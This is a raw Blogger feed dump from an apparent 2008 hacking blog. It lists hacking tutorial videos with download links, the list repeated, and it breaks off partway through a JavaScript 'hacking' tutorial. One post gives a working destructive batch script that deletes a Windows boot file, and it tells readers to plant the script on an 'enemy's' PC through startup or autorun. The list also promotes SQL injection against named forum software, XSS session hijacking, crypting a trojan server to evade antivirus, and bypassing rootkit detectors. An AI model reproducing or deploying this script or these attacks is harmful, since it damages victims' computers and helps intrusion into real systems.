Websites Embedded SWF File Vulnerability Demonstration&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266905/84_SWF_Vul_Demo.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;38. IPB 1.3 SQL&lt;br /&gt;Invasion Power Board 1.3 SQL Injection Exploit&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266890/86_IPB_SQL.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;39. Qnix Buffer Overflows&lt;br /&gt;Qnix Demonstrating Exploration of Simple Buffer Overflows&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266902/87_buff.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;40. ASP SQL&lt;br /&gt;Simple ASP Administrator SQL Injection&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266901/88_asp_sql.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;41. 0-DAY Simple SQL Injection&lt;br /&gt;A film project about a cracker with the name zer0day. (Hacking with Linux -php)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266933/89_simple-sql-injection.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;42. Hacker Defender Movie&lt;br /&gt;Shows how Brilliant Hacker defender bypasses several rootkits detectors.&lt;br /&gt;You can see bypassing IceSword, BlackLight, RootkitRevealer and more.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266887/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;43. NASA Department website Hacked&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266900/92_meh.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;44. Vbulletin 3.5.4 exploit)&lt;br /&gt;By M4k3 from www.pldsoft.com shows how to use Exploit : www.vicitimsite.com/forumpath/install/upgrade.php?step= [any letters, not numbers!]&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266892/93_vbulletin.new.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;45. Linux network monitor&lt;br /&gt;This video shows you how to set up ntop, a network monitoring program, on GNU/Linux.&lt;br /&gt;Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc.&lt;br /&gt;It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266883/95_CBT4Free-Linux_Network_Monitor.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;46. Linux DNS Server&lt;br /&gt;This video explains how to set up a DNS server on a GNU/Linux server.&lt;br /&gt;In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship.&lt;br /&gt;This video is specifically tailored to setting up DNS for a web server&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266913/97_CBT4Free-Linux_DNS_Server.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;47. Windows Web Server&lt;br /&gt;This video details the installation and configuration of Apache, MySQL, and PHP on windows.&lt;br /&gt;This video is made specifically or those using windows 2000 Pro / XP Home / XP Pro&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266898/98_windows_Web_Server.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;48. Win Server 2003 IIS and DNS (4mb)&lt;br /&gt;This video shows how to install and configure IIS and DNS on windows Server 2003 for virtual hosting.&lt;br /&gt;These procedures will work with all versions of windows Server 2003 and possibly with windows 2000 Server&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266891/99_windows_Server_2003_IIS_and_DNS.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;49. DeluxeBB 1.06 Exploit)&lt;br /&gt;Remote SQL Injection Exploit&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266896/100_live585.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;50. NetBios Live Hack&lt;br /&gt;Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266881/101_netbios585.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;51. Classified&lt;br /&gt;Shows how site classified is Hacked&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266894/102_site585.rar.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1710181568077518757?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1710181568077518757/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1710181568077518757' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1710181568077518757'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1710181568077518757'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/list-of-hacking-tutorial-video_23.html' title='List of Hacking Tutorial Video Collection'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-7649267379353697583</id><published>2008-09-23T05:57:00.000-07:00</published><updated>2008-09-23T05:58:07.134-07:00</updated><title type='text'>List of Hacking Tutorial Video Collection</title><content type='html'>1. Hacking Server&lt;br /&gt;Hacking Web Server and installing Sock&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266934/15_my_noski.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. Hacking Site&lt;br /&gt;Hacking Site and getting root&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266961/16_history_vzlom.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;3. Brutus&lt;br /&gt;Use Brutus to crack a box running telnet.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266925/17_brutus1.avi.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. Fusion&lt;br /&gt;SQL injection on PHP_Fusion Site.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266924/18_fusion.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;5. Wireless&lt;br /&gt;This video shows a real life wireless hack.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266930/19_lequipe.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;6. Netbios&lt;br /&gt;This video shows how to exploit file sharing.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266927/20_netbios.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;7. ARP Spoofing&lt;br /&gt;This video shows how to perform an ARP Spoofing attack.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266928/21_ARPSpoofing.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;8. Jpeg exploit&lt;br /&gt;This video shows you how to use the jpeg exploit&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266945/22_jpegadmin.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;9. Hacking ParaChat&lt;br /&gt;A video that shows you how to hack parachat v5.5&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266937/23_ParaChat1.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;10. E-mail&lt;br /&gt;Tracing an E-mail and finding out more about the host that sent it and its IP.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266940/24_e-mail-ip.avi.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;11. Boot from Phlak and run Chkrootkit to detect a compromise&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266907/31_chkrootkit1.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;12. WiGLE, JiGLE and Google Earth: Mapping out your wardrive&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266947/45_wigle1.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;13. Using VirtualDub and a cheap webcam as a camcorder&lt;br /&gt;I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266948/49_cheapcamcorder.avi.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;14. Using VMware Player to run Live CDs (Bootable ISOs)&lt;br /&gt;In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266953/52_vmwareplayerlivecd.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;15. Make your own VMs with hard drive for free: VMware Player + VMX Builder&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266915/54_vmxbuilder.swf.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;16. Yahoo.com&lt;br /&gt;Vulnerabilities of the post service yahoo.com&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266926/57_yahoo.com.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;17. wwwHack&lt;br /&gt;Use of wwwhack tool on vBulletin&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266914/59_wwwhack.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;18. XSS&lt;br /&gt;Cross site scripting (XSS) in MercuryBoard&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266912/60_new_xss.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;19. John The Ripper&lt;br /&gt;Basic work with "John The Ripper"&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266919/61_jtr.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;20. PHP/SQL Injection&lt;br /&gt;Site hacked with php exploit and known SQL injection.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266910/63_php_and_sql.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;21. UBB threads 6.2.3&lt;br /&gt;UBB Forum hacked with SQL injection.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266920/64_ubb.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;22. Bitfrost Server Crypting&lt;br /&gt;This is nice video for any one learning how to add bytes to make there server undetectable.&lt;br /&gt;RAR-Password == Crypt&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266968/66_Bifrost_Server_Cryp.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;23. Microsoft.com Bugs&lt;br /&gt;Nice videos shows of old bug that was exploited on the site&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266904/67_MICROSOFT.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;24. Interview with Kevin Mitnick&lt;br /&gt;He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266959/68_kevin.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;25. Unix Shell Fundamentals : VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266984/69_UnixShellFund.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;26. C++ Video tutorials&lt;br /&gt;Nice C/C++ Shockwave videos&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266939/70_C__.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;27. Tunneling Exploits via SSH&lt;br /&gt;An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266931/74_see-sec-ssh-dcom-tunneling.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;28. Cracking WEP in 10 Minutes&lt;br /&gt;A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs.&lt;br /&gt;You'll think twice about WEP after this&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266943/75_see-sec-wepcrack.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;29. A classic client side attack&lt;br /&gt;The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266911/76_see-sec-client-side.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;30. Blind MySQL&lt;br /&gt;Demonstration of Blind MySQL Injection (bsqlbf)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266929/77_Blind_MySQL.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;31. D-Link Wireless&lt;br /&gt;Intruders D-Link Wireless Access Point Configuration Disclosure&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266909/78_D-Link_Wireless.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;32. Mysql bftools&lt;br /&gt;Demonstration of Blind MySQL Injection (mysql_bftools)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266923/79_mysql_bftools.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;33. PHP Remote File&lt;br /&gt;PHP Remote File Inclusion Windows Backdoor.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266941/80_PHP_Remote.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;34. vBulletin XSS&lt;br /&gt;vBulletin XSS Demonstration with Session Hijacking&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266955/81_vBulletin_XSS.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;35. wbb portal hacked by XSS&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266950/82_wbb_portal.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;36. Reverse Engineering&lt;br /&gt;Reverse Engineering with LD PRELOAD&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266965/83_reverse.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;37. SWF File Vulnerability&lt;br /&gt;Multiple Websites Embedded SWF File Vulnerability Demonstration&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266905/84_SWF_Vul_Demo.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;38. IPB 1.3 SQL&lt;br /&gt;Invasion Power Board 1.3 SQL Injection Exploit&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266890/86_IPB_SQL.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;39. Qnix Buffer Overflows&lt;br /&gt;Qnix Demonstrating Exploration of Simple Buffer Overflows&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266902/87_buff.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;40. ASP SQL&lt;br /&gt;Simple ASP Administrator SQL Injection&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266901/88_asp_sql.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;41. 0-DAY Simple SQL Injection&lt;br /&gt;A film project about a cracker with the name zer0day. (Hacking with Linux -php)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266933/89_simple-sql-injection.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;42. Hacker Defender Movie&lt;br /&gt;Shows how Brilliant Hacker defender bypasses several rootkits detectors.&lt;br /&gt;You can see bypassing IceSword, BlackLight, RootkitRevealer and more.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266887/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;43. NASA Department website Hacked&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266900/92_meh.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;44. Vbulletin 3.5.4 exploit)&lt;br /&gt;By M4k3 from www.pldsoft.com shows how to use Exploit : www.vicitimsite.com/forumpath/install/upgrade.php?step= [any letters, not numbers!]&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266892/93_vbulletin.new.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;45. Linux network monitor&lt;br /&gt;This video shows you how to set up ntop, a network monitoring program, on GNU/Linux.&lt;br /&gt;Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc.&lt;br /&gt;It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266883/95_CBT4Free-Linux_Network_Monitor.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;46. Linux DNS Server&lt;br /&gt;This video explains how to set up a DNS server on a GNU/Linux server.&lt;br /&gt;In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship.&lt;br /&gt;This video is specifically tailored to setting up DNS for a web server&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266913/97_CBT4Free-Linux_DNS_Server.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;47. Windows Web Server&lt;br /&gt;This video details the installation and configuration of Apache, MySQL, and PHP on windows.&lt;br /&gt;This video is made specifically or those using windows 2000 Pro / XP Home / XP Pro&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266898/98_windows_Web_Server.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;48. Win Server 2003 IIS and DNS (4mb)&lt;br /&gt;This video shows how to install and configure IIS and DNS on windows Server 2003 for virtual hosting.&lt;br /&gt;These procedures will work with all versions of windows Server 2003 and possibly with windows 2000 Server&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266891/99_windows_Server_2003_IIS_and_DNS.zip.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;49. DeluxeBB 1.06 Exploit)&lt;br /&gt;Remote SQL Injection Exploit&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266896/100_live585.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;50. NetBios Live Hack&lt;br /&gt;Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266881/101_netbios585.rar.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;51. Classified&lt;br /&gt;Shows how site classified is Hacked&lt;br /&gt;&lt;br /&gt;http://rapidshare.com/files/47266894/102_site585.rar.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-7649267379353697583?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/7649267379353697583/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=7649267379353697583' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7649267379353697583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/7649267379353697583'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/list-of-hacking-tutorial-video.html' title='List of Hacking Tutorial Video Collection'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1022979496261272135</id><published>2008-09-18T08:01:00.000-07:00</published><updated>2008-09-18T08:02:01.166-07:00</updated><title type='text'>Block your enemies PC</title><content type='html'>Copy the code below @ the notepad&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo off&lt;br /&gt;C:&lt;br /&gt;cd..&lt;br /&gt;cd..&lt;br /&gt;cd..&lt;br /&gt;attrib -r -s -h ntdetect.com&lt;br /&gt;del ntdetect.com&lt;br /&gt;echo on&lt;br /&gt;print U r a bloody LOSER HACKER is a Winner&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Save this file as virus.bat or any other name with .bat extension, a kinda batch file.&lt;br /&gt;&lt;br /&gt;Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.&lt;br /&gt;&lt;br /&gt;With this activated once the computer will run perfectly&lt;br /&gt;&lt;br /&gt;On Restart, it wont start again and U will have to format it&lt;br /&gt;(Exceptions are only if U know how to use DOS).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1022979496261272135?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1022979496261272135/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1022979496261272135' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1022979496261272135'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1022979496261272135'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/09/block-your-enemies-pc.html' title='Block your enemies PC'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3853535528342104394</id><published>2008-09-17T11:37:00.000-07:00</published><updated>2008-09-17T11:39:20.450-07:00</updated><title type='text'>Hacking with Javascript. </title><content type='html'>Hacking with Javascript.&lt;br /&gt;&lt;br /&gt;Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.&lt;br /&gt;&lt;br /&gt;There are a few benifits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source, if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript making simple scripts and usful features to my site.&lt;br /&gt;&lt;br /&gt;It was only after I was pretty good with javascript and got into hacking that I slowly saw it's potential to be used milisously. Many javascript techniques are pretty simple and involve tricking the user into doing something. Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with an are purely theorectical. I hope you will realize how much javascript can aid a hacker.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Basic Syntax&lt;br /&gt;2. Places To Learn More Advanced Javascript&lt;br /&gt;3. Banner Busting &amp;amp; Killing Frames&lt;br /&gt;4. Getting Past Scripts That Filter Javascript&lt;br /&gt;5. Stealing Cookies&lt;br /&gt;6. Stealing Forms&lt;br /&gt;7. Gaining Info On Users&lt;br /&gt;8. Stories Of Javascript Hacks&lt;br /&gt;9. Conclusion&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Basic Syntax&lt;br /&gt;The basics of javascript are fairly easy if you have programmed anything before, although javascript is not java, if you know java you should have no problems learning it. Same for any other programming language, as most share the same basics as javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin if you don't know html you must learn it first!&lt;br /&gt;&lt;br /&gt;Javascript starts with the tag &lt;script language="javascript"&gt; and ends with &lt;/script&gt; Anything between these two tags is interpreted as javascript by the browser. Remember this! Cause a few hacks use the fact that if you use &lt;script type="javascript"&gt; and don't finish it all the html on the page underneath that is ignored. You can also use &lt;script type="text/javascript"&gt; and &lt;&lt;/script&gt;.. either way is fine. I would also like to mention that many scripts have &lt;!-- right after the &lt;script type="text/javascript"&gt; tag and //--&gt; right before the tag, this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the&lt;!-- and //--&gt; because that is how I learned to script and I got used to putting it in.&lt;br /&gt;&lt;br /&gt;Javascript uses the same basic elements as other programming languages.. Such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:&lt;br /&gt;&lt;br /&gt;to define a variable as a number you do: var name = 1;&lt;br /&gt;to define a variable as a string you do: var name = 'value';&lt;br /&gt;&lt;br /&gt;A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Only variable types are defined by 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like: 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you got the variables down lets see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; var name = 'b0iler';&lt;br /&gt; var adjective = 'owns';&lt;br /&gt; document.write(name+adjective);&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;b0ilerowns&lt;br /&gt;&lt;br /&gt;first we define the variable 'name' as b0iler, then I define 'adjective' as owns. Then the document.write() function writes it to the page as 'name'+'adjective' or b0ilerowns. If we wanted a space we could have did document.write(name+' '+adjective);&lt;br /&gt;&lt;br /&gt;Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploitting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:&lt;br /&gt;&lt;br /&gt;b0iler's website&lt;br /&gt;&lt;br /&gt;We couldn't do:&lt;br /&gt;&lt;br /&gt;document.write('b0iler's website');&lt;br /&gt;&lt;br /&gt;because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:&lt;br /&gt;document.write('b0iler\'s website');&lt;br /&gt;&lt;br /&gt;There are two types of comments in javascript. // which only lasts till the end of the line, and /* which goes as many as far as possible until it reaches */ I'll demonstrate:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; document.write('this will show up'); // this will not, even document.write('blah'); won't&lt;br /&gt; /* document.write('this also will not show up');&lt;br /&gt; this won't ether. document.write('or this');&lt;br /&gt; it is all in the comments.. which aren't rendered by the browser */&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;this will show up&lt;br /&gt;&lt;br /&gt;The only thing that script will do is print "this will show up". Everything else is in comments which are not rendered as javascript by the browser.&lt;br /&gt;&lt;br /&gt;Flow Control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. You can do this a few different ways different ways. The simplest is the if-then-else statements. Here is an example:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt; &lt;!--&lt;br /&gt; var name = 'b0iler';&lt;br /&gt; &lt;br /&gt; if (name == 'b0iler'){ document.write('b0iler is a really cool guy!'); }&lt;br /&gt; else { document.write('b0iler can not define variables worth a hoot!'); }&lt;br /&gt; //--&gt;&lt;br /&gt; &lt;/script&gt;&lt;br /&gt;&lt;br /&gt;Lets break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to 